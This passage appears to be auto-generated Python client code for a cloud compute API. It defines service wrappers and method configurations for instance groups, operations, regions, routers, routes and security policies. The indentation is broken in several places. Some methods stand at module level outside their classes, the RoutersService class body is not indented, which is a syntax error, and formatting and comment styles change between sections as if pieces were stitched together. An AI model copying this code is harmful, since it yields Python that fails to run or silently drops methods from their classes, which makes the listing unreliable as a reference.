    request_field=u'regionInstanceGroupManagersRecreateRequest',
    request_type_name=u'ComputeRegionInstanceGroupManagersRecreateInstancesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Resize(self, request, global_params=None):
    """Changes the intended size for the managed instance group. If you increase the size, the group schedules actions to create new instances using the current instance template. If you decrease the size, the group schedules delete actions on one or more instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating or deleting actions with the listmanagedinstances method.

    If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

    Args:
      request: (ComputeRegionInstanceGroupManagersResizeRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('Resize'), request,
        global_params=global_params)

# 'size' is a required query parameter here, hence its presence in both
# ordered_params and query_params.
Resize.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/resize',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.resize',
    ordered_params=[u'project', u'region', u'instanceGroupManager', u'size'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId', u'size'],
    request_field='',
    request_type_name=u'ComputeRegionInstanceGroupManagersResizeRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetAutoHealingPolicies(self, request, global_params=None):
    """Modifies the autohealing policy for the instances in this managed instance group.

    Args:
      request: (ComputeRegionInstanceGroupManagersSetAutoHealingPoliciesRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('SetAutoHealingPolicies'), request,
        global_params=global_params)

SetAutoHealingPolicies.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setAutoHealingPolicies',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.setAutoHealingPolicies',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId'],
    request_field=u'regionInstanceGroupManagersSetAutoHealingRequest',
    request_type_name=u'ComputeRegionInstanceGroupManagersSetAutoHealingPoliciesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetInstanceTemplate(self, request, global_params=None):
    """Sets the instance template to use when creating new instances or recreating instances in this group. Existing instances are not affected.

    Args:
      request: (ComputeRegionInstanceGroupManagersSetInstanceTemplateRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('SetInstanceTemplate'), request,
        global_params=global_params)

SetInstanceTemplate.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setInstanceTemplate',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.setInstanceTemplate',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId'],
    request_field=u'regionInstanceGroupManagersSetTemplateRequest',
    request_type_name=u'ComputeRegionInstanceGroupManagersSetInstanceTemplateRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetTargetPools(self, request, global_params=None):
    """Modifies the target pools to which all new instances in this group are assigned. Existing instances in the group are not affected.

    Args:
      request: (ComputeRegionInstanceGroupManagersSetTargetPoolsRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('SetTargetPools'), request,
        global_params=global_params)

SetTargetPools.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setTargetPools',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.setTargetPools',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId'],
    request_field=u'regionInstanceGroupManagersSetTargetPoolsRequest',
    request_type_name=u'ComputeRegionInstanceGroupManagersSetTargetPoolsRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeRegionInstanceGroupManagersTestIamPermissionsRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (TestPermissionsResponse) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('TestIamPermissions'), request,
        global_params=global_params)

TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{resource}/testIamPermissions',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.testIamPermissions',
    ordered_params=[u'project', u'region', u'resource'],
    path_params=[u'project', u'region', u'resource'],
    query_params=[],
    request_field=u'testPermissionsRequest',
    request_type_name=u'ComputeRegionInstanceGroupManagersTestIamPermissionsRequest',
    response_type_name=u'TestPermissionsResponse',
    supports_download=False,
)
def Update(self, request, global_params=None):
    """Updates a managed instance group using the information that you specify in the request. This operation is marked as DONE when the group is updated even if the instances in the group have not yet been updated. You must separately verify the status of the individual instances with the listmanagedinstances method.

    Args:
      request: (ComputeRegionInstanceGroupManagersUpdateRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('Update'), request,
        global_params=global_params)

Update.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
    http_method=u'PUT',
    method_id=u'compute.regionInstanceGroupManagers.update',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagerResource',
    request_type_name=u'ComputeRegionInstanceGroupManagersUpdateRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
class RegionInstanceGroupsService(base_api.BaseApiService):
    """Service class for the regionInstanceGroups resource."""

    _NAME = u'regionInstanceGroups'

    def __init__(self, client):
        """Attach this service wrapper to *client* for issuing requests."""
        super(ComputeBeta.RegionInstanceGroupsService, self).__init__(client)
        # This service exposes no media-upload methods.
        self._upload_configs = {}

    def Get(self, request, global_params=None):
        """Returns the specified instance group resource.

        Args:
          request: (ComputeRegionInstanceGroupsGetRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (InstanceGroup) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}',
        http_method=u'GET',
        method_id=u'compute.regionInstanceGroups.get',
        ordered_params=[u'project', u'region', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'region'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupsGetRequest',
        response_type_name=u'InstanceGroup',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of instance group resources contained within the specified region.

        Args:
          request: (ComputeRegionInstanceGroupsListRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (RegionInstanceGroupList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}/instanceGroups',
        http_method=u'GET',
        method_id=u'compute.regionInstanceGroups.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupsListRequest',
        response_type_name=u'RegionInstanceGroupList',
        supports_download=False,
    )

    def ListInstances(self, request, global_params=None):
        """Lists the instances in the specified instance group and displays information about the named ports. Depending on the specified options, this method can list all instances or only the instances that are running.

        Args:
          request: (ComputeRegionInstanceGroupsListInstancesRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (RegionInstanceGroupsListInstances) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('ListInstances'), request,
            global_params=global_params)

    ListInstances.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}/listInstances',
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroups.listInstances',
        ordered_params=[u'project', u'region', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        request_field=u'regionInstanceGroupsListInstancesRequest',
        request_type_name=u'ComputeRegionInstanceGroupsListInstancesRequest',
        response_type_name=u'RegionInstanceGroupsListInstances',
        supports_download=False,
    )

    def SetNamedPorts(self, request, global_params=None):
        """Sets the named ports for the specified regional instance group.

        Args:
          request: (ComputeRegionInstanceGroupsSetNamedPortsRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetNamedPorts'), request,
            global_params=global_params)

    SetNamedPorts.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}/setNamedPorts',
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroups.setNamedPorts',
        ordered_params=[u'project', u'region', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'region'],
        query_params=[u'requestId'],
        request_field=u'regionInstanceGroupsSetNamedPortsRequest',
        request_type_name=u'ComputeRegionInstanceGroupsSetNamedPortsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def TestIamPermissions(self, request, global_params=None):
        """Returns permissions that a caller has on the specified resource.

        Args:
          request: (ComputeRegionInstanceGroupsTestIamPermissionsRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (TestPermissionsResponse) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('TestIamPermissions'), request,
            global_params=global_params)

    TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}/instanceGroups/{resource}/testIamPermissions',
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroups.testIamPermissions',
        ordered_params=[u'project', u'region', u'resource'],
        path_params=[u'project', u'region', u'resource'],
        query_params=[],
        request_field=u'testPermissionsRequest',
        request_type_name=u'ComputeRegionInstanceGroupsTestIamPermissionsRequest',
        response_type_name=u'TestPermissionsResponse',
        supports_download=False,
    )
class RegionOperationsService(base_api.BaseApiService):
    """Service class for the regionOperations resource."""

    _NAME = u'regionOperations'

    def __init__(self, client):
        """Attach this service wrapper to *client* for issuing requests."""
        super(ComputeBeta.RegionOperationsService, self).__init__(client)
        # This service exposes no media-upload methods.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified region-specific Operations resource.

        Args:
          request: (ComputeRegionOperationsDeleteRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (ComputeRegionOperationsDeleteResponse) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}/operations/{operation}',
        http_method=u'DELETE',
        method_id=u'compute.regionOperations.delete',
        ordered_params=[u'project', u'region', u'operation'],
        path_params=[u'operation', u'project', u'region'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeRegionOperationsDeleteRequest',
        response_type_name=u'ComputeRegionOperationsDeleteResponse',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Retrieves the specified region-specific Operations resource.

        Args:
          request: (ComputeRegionOperationsGetRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}/operations/{operation}',
        http_method=u'GET',
        method_id=u'compute.regionOperations.get',
        ordered_params=[u'project', u'region', u'operation'],
        path_params=[u'operation', u'project', u'region'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeRegionOperationsGetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of Operation resources contained within the specified region.

        Args:
          request: (ComputeRegionOperationsListRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (OperationList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}/operations',
        http_method=u'GET',
        method_id=u'compute.regionOperations.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        request_field='',
        request_type_name=u'ComputeRegionOperationsListRequest',
        response_type_name=u'OperationList',
        supports_download=False,
    )
class RegionsService(base_api.BaseApiService):
    """Service class for the regions resource."""

    _NAME = u'regions'

    def __init__(self, client):
        """Attach this service wrapper to *client* for issuing requests."""
        super(ComputeBeta.RegionsService, self).__init__(client)
        # This service exposes no media-upload methods.
        self._upload_configs = {}

    def Get(self, request, global_params=None):
        """Returns the specified Region resource. Get a list of available regions by making a list() request.

        Args:
          request: (ComputeRegionsGetRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (Region) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions/{region}',
        http_method=u'GET',
        method_id=u'compute.regions.get',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeRegionsGetRequest',
        response_type_name=u'Region',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of region resources available to the specified project.

        Args:
          request: (ComputeRegionsListRequest) input message.
          global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
          (RegionList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        relative_path=u'projects/{project}/regions',
        http_method=u'GET',
        method_id=u'compute.regions.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        request_field='',
        request_type_name=u'ComputeRegionsListRequest',
        response_type_name=u'RegionList',
        supports_download=False,
    )
class RoutersService(base_api.BaseApiService):
"""Service class for the routers resource."""
_NAME = u'routers'
def __init__(self, client):
    """Attach this service wrapper to *client* for issuing requests."""
    super(ComputeBeta.RoutersService, self).__init__(client)
    # This service exposes no media-upload methods.
    self._upload_configs = {}
def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of routers.

    Args:
      request: (ComputeRoutersAggregatedListRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (RouterAggregatedList) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('AggregatedList'), request,
        global_params=global_params)

AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/aggregated/routers',
    http_method=u'GET',
    method_id=u'compute.routers.aggregatedList',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeRoutersAggregatedListRequest',
    response_type_name=u'RouterAggregatedList',
    supports_download=False,
)
def Delete(self, request, global_params=None):
    """Deletes the specified Router resource.

    Args:
      request: (ComputeRoutersDeleteRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

Delete.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/routers/{router}',
    http_method=u'DELETE',
    method_id=u'compute.routers.delete',
    ordered_params=[u'project', u'region', u'router'],
    path_params=[u'project', u'region', u'router'],
    query_params=[u'requestId'],
    request_field='',
    request_type_name=u'ComputeRoutersDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
    """Returns the specified Router resource. Get a list of available routers by making a list() request.

    Args:
      request: (ComputeRoutersGetRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Router) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/routers/{router}',
    http_method=u'GET',
    method_id=u'compute.routers.get',
    ordered_params=[u'project', u'region', u'router'],
    path_params=[u'project', u'region', u'router'],
    query_params=[],
    request_field='',
    request_type_name=u'ComputeRoutersGetRequest',
    response_type_name=u'Router',
    supports_download=False,
)
def GetRouterStatus(self, request, global_params=None):
    """Retrieves runtime information of the specified router.

    Args:
      request: (ComputeRoutersGetRouterStatusRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (RouterStatusResponse) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('GetRouterStatus'), request,
        global_params=global_params)

GetRouterStatus.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/routers/{router}/getRouterStatus',
    http_method=u'GET',
    method_id=u'compute.routers.getRouterStatus',
    ordered_params=[u'project', u'region', u'router'],
    path_params=[u'project', u'region', u'router'],
    query_params=[],
    request_field='',
    request_type_name=u'ComputeRoutersGetRouterStatusRequest',
    response_type_name=u'RouterStatusResponse',
    supports_download=False,
)
def Insert(self, request, global_params=None):
  """Creates a Router resource in the specified project and region using the data included in the request.

  Args:
    request: (ComputeRoutersInsertRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('Insert')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.routers.insert; the lambda defers
# construction of the ApiMethodInfo until it is requested.
Insert.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.routers.insert',
    http_method=u'POST',
    ordered_params=[u'project', u'region'],
    path_params=[u'project', u'region'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/regions/{region}/routers',
    request_field=u'router',
    request_type_name=u'ComputeRoutersInsertRequest',
    response_type_name=u'Operation',
    supports_download=False)
def List(self, request, global_params=None):
  """Retrieves a list of Router resources available to the specified project.

  Args:
    request: (ComputeRoutersListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (RouterList) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('List')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.routers.list; the lambda defers
# construction of the ApiMethodInfo until it is requested.
List.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.routers.list',
    http_method=u'GET',
    ordered_params=[u'project', u'region'],
    path_params=[u'project', u'region'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    relative_path=u'projects/{project}/regions/{region}/routers',
    request_field='',
    request_type_name=u'ComputeRoutersListRequest',
    response_type_name=u'RouterList',
    supports_download=False)
def Patch(self, request, global_params=None):
  """Patches the specified Router resource with the data included in the request. This method supports PATCH semantics and uses JSON merge patch format and processing rules.

  Args:
    request: (ComputeRoutersPatchRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('Patch')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.routers.patch; the lambda defers
# construction of the ApiMethodInfo until it is requested.
Patch.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.routers.patch',
    http_method=u'PATCH',
    ordered_params=[u'project', u'region', u'router'],
    path_params=[u'project', u'region', u'router'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/regions/{region}/routers/{router}',
    request_field=u'routerResource',
    request_type_name=u'ComputeRoutersPatchRequest',
    response_type_name=u'Operation',
    supports_download=False)
def Preview(self, request, global_params=None):
  """Preview fields auto-generated during router create and update operations. Calling this method does NOT create or update the router.

  Args:
    request: (ComputeRoutersPreviewRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (RoutersPreviewResponse) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('Preview')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.routers.preview; the lambda defers
# construction of the ApiMethodInfo until it is requested.
Preview.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.routers.preview',
    http_method=u'POST',
    ordered_params=[u'project', u'region', u'router'],
    path_params=[u'project', u'region', u'router'],
    query_params=[],
    relative_path=u'projects/{project}/regions/{region}/routers/{router}/preview',
    request_field=u'routerResource',
    request_type_name=u'ComputeRoutersPreviewRequest',
    response_type_name=u'RoutersPreviewResponse',
    supports_download=False)
def TestIamPermissions(self, request, global_params=None):
  """Returns permissions that a caller has on the specified resource.

  Args:
    request: (ComputeRoutersTestIamPermissionsRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (TestPermissionsResponse) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('TestIamPermissions')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.routers.testIamPermissions; the lambda
# defers construction of the ApiMethodInfo until it is requested.
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.routers.testIamPermissions',
    http_method=u'POST',
    ordered_params=[u'project', u'region', u'resource'],
    path_params=[u'project', u'region', u'resource'],
    query_params=[],
    relative_path=u'projects/{project}/regions/{region}/routers/{resource}/testIamPermissions',
    request_field=u'testPermissionsRequest',
    request_type_name=u'ComputeRoutersTestIamPermissionsRequest',
    response_type_name=u'TestPermissionsResponse',
    supports_download=False)
def Update(self, request, global_params=None):
  """Updates the specified Router resource with the data included in the request.

  Args:
    request: (ComputeRoutersUpdateRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve this method's wire configuration, then delegate the actual
  # HTTP round trip to the shared base-service machinery.
  method_config = self.GetMethodConfig('Update')
  return self._RunMethod(method_config, request,
                         global_params=global_params)

# Wire-level description of compute.routers.update; the lambda defers
# construction of the ApiMethodInfo until it is requested.
Update.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.routers.update',
    http_method=u'PUT',
    ordered_params=[u'project', u'region', u'router'],
    path_params=[u'project', u'region', u'router'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/regions/{region}/routers/{router}',
    request_field=u'routerResource',
    request_type_name=u'ComputeRoutersUpdateRequest',
    response_type_name=u'Operation',
    supports_download=False)
class RoutesService(base_api.BaseApiService):
  """Service class for the routes resource.

  Each public method resolves its ApiMethodInfo via GetMethodConfig and
  delegates the HTTP call to the inherited _RunMethod helper.
  """

  # Resource collection name.
  _NAME = u'routes'

  def __init__(self, client):
    super(ComputeBeta.RoutesService, self).__init__(client)
    # No media-upload configurations are defined for this collection.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified Route resource.

    Args:
      request: (ComputeRoutesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Each <Method>.method_config below is wrapped in a lambda so that the
  # ApiMethodInfo is constructed only when it is requested.
  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.routes.delete',
      ordered_params=[u'project', u'route'],
      path_params=[u'project', u'route'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/routes/{route}',
      request_field='',
      request_type_name=u'ComputeRoutesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified Route resource. Get a list of available routes by making a list() request.

    Args:
      request: (ComputeRoutesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Route) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.routes.get',
      ordered_params=[u'project', u'route'],
      path_params=[u'project', u'route'],
      query_params=[],
      relative_path=u'projects/{project}/global/routes/{route}',
      request_field='',
      request_type_name=u'ComputeRoutesGetRequest',
      response_type_name=u'Route',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a Route resource in the specified project using the data included in the request.

    Args:
      request: (ComputeRoutesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.routes.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/routes',
      request_field=u'route',
      request_type_name=u'ComputeRoutesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of Route resources available to the specified project.

    Args:
      request: (ComputeRoutesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (RouteList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.routes.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/routes',
      request_field='',
      request_type_name=u'ComputeRoutesListRequest',
      response_type_name=u'RouteList',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeRoutesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.routes.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/routes/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeRoutesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class SecurityPoliciesService(base_api.BaseApiService):
  """Service class for the securityPolicies resource.

  Each public method resolves its ApiMethodInfo via GetMethodConfig and
  delegates the HTTP call to the inherited _RunMethod helper.
  """

  # Resource collection name.
  _NAME = u'securityPolicies'

  def __init__(self, client):
    super(ComputeBeta.SecurityPoliciesService, self).__init__(client)
    # No media-upload configurations are defined for this collection.
    self._upload_configs = {
        }

  def AddRule(self, request, global_params=None):
    """Inserts a rule into a security policy.

    Args:
      request: (ComputeSecurityPoliciesAddRuleRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('AddRule')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Each <Method>.method_config below is wrapped in a lambda so that the
  # ApiMethodInfo is constructed only when it is requested.
  AddRule.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.securityPolicies.addRule',
      ordered_params=[u'project', u'securityPolicy'],
      path_params=[u'project', u'securityPolicy'],
      query_params=[],
      relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}/addRule',
      request_field=u'securityPolicyRule',
      request_type_name=u'ComputeSecurityPoliciesAddRuleRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified policy.

    Args:
      request: (ComputeSecurityPoliciesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.securityPolicies.delete',
      ordered_params=[u'project', u'securityPolicy'],
